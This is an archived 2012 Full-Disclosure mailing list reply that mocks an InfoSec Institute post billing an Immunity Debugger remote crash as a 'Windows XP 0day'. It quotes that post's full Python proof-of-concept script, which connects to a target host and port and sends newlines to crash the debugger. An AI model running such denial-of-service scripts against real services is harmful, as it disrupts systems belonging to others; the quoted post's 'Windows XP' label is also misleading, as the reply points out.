lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Tue, 17 Apr 2012 13:12:44 +0530
From: Memory Vandal <memvandal@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Windows XP denial of service 0day found in
	CTF exercise

Windows XP 0day? LOL. seems InfoSec Institute is going crazy day by day.

and who exploits remote DDoS on 127.0.0.1 and takes screenshot?! lol

MemoryVandal


On Tue, Apr 17, 2012 at 12:18 PM, Adam Behnke <adam@...osecinstitute.com>wrote:

> Immunity Debugger Remote Denial of Service 0Day
> Tested against version 1.76 and 1.80 on Windows XP distributions
>
> Has not been tested for potential privilege escalation vectors.
>
> We first wrote about Immunity Debugger here:
> http://news.infosecinstitute.com/general/release-immunity-debugger-v1-80/
>
> Discovered by a student that wishes to remain anonymous in the course CTF.
> This 0day exploit for Windows was discovered by a student in the InfoSec
> Institute Ethical Hacking class, during an evening CTF exercise. The
> student wishes to remain anonymous, he has contributed a python version of
> the 0day. A patch that can be applied to Windows has not been made
> available. You can find a python version of the exploit to copy and paste
> here:
>
>
> #!/usr/bin/python
> #Windows XP denial of service 0day exploit discovered on 4.9.12 by InfoSec
> Institute student
> #For full write up and description go to
> http://www.infosecinstitute.com/courses/ethical_hacking_training.html
> import sys
> import os
> import time
> import getopt
> import socket
>
> class Error(Exception):
>        def __init__(self, error):
>                self.errorStr=error
>
>        def __str__(self):
>                return repr(self.errorStr)
>
> class Exploit():
>
>        def __init__(self, targetHost, targetPort):
>                self.targetHost = targetHost
>
>        def exploit(self, targetHost, targetPort):
>
>                try:
>                        socket.inet_aton(targetHost)
>                        s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
>                        s.connect((targetHost,targetPort))
>                except socket.error:
>                        raise Error("Unable to exploit (Connect failed.)")
>                        sys.exit(0)
>
>                # exploit
>                try:
>                        s.sendto("\n\n\n", (targetHost, targetPort))
>                except:
>                        raise Error("Unable to exploit (Exploit failed.)")
>
>
> def usage():
>        print "[!] Usage:"
>        print " ( -h, --help ):"
>        print "         Print this message."
>        print " ( --targetHost= ): Target host."
>        print "         --targetHost=127.0.0.1"
>        print " ( --targetPort= ): Target port."
>        print "         --targetPort=8888"
>
> def main():
>        print "[$] Windows XP 0Day"
>        try:
>                opts, args = getopt.getopt(sys.argv[1:], "h", ["help",
> "targetHost=", "targetPort="])
>        except getopt.GetoptError, err:
>                # Print help information and exit:
>                print '[!] Parameter error:' + str(err) # Will print
> something like "option -a not recognized"
>                usage()
>                sys.exit(0)
>
>        targetHost=None
>        targetPort=None
>
>        for opt, arg in opts:
>                if opt in ("-h", "--help"):
>                        usage()
>                        sys.exit(0)
>                elif opt =="--targetHost":
>                        targetHost=arg
>                elif opt =="--targetPort":
>                        targetPort=arg
>                else:
>                        # I would be assuming to say we'll never get here.
>                        print "[!] Parameter error."
>                        usage()
>                        sys.exit(0)
>
>        if not targetHost:
>                print "[!] Parameter error: targetHost not set."
>                usage()
>                sys.exit(0)
>
>        if not targetPort:
>                print "[!] Parameter error: targetPort not set."
>                usage()
>                sys.exit(0)
>
>        exploit = Exploit(targetHost, targetPort)
>
>        print "[*] Attempting to exploit:"
>
>        try:
>                exploit.exploit(targetHost, int(targetPort))
>        except Error as error:
>                print "[!] Exploit Error: %s" % (error.errorStr)
>                exit(0)
>        print "[*] Exploit appears to have worked."
>
> # Standard boilerplate to call the main() function to begin
> # the program.
> if __name__=='__main__':
>        main()
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ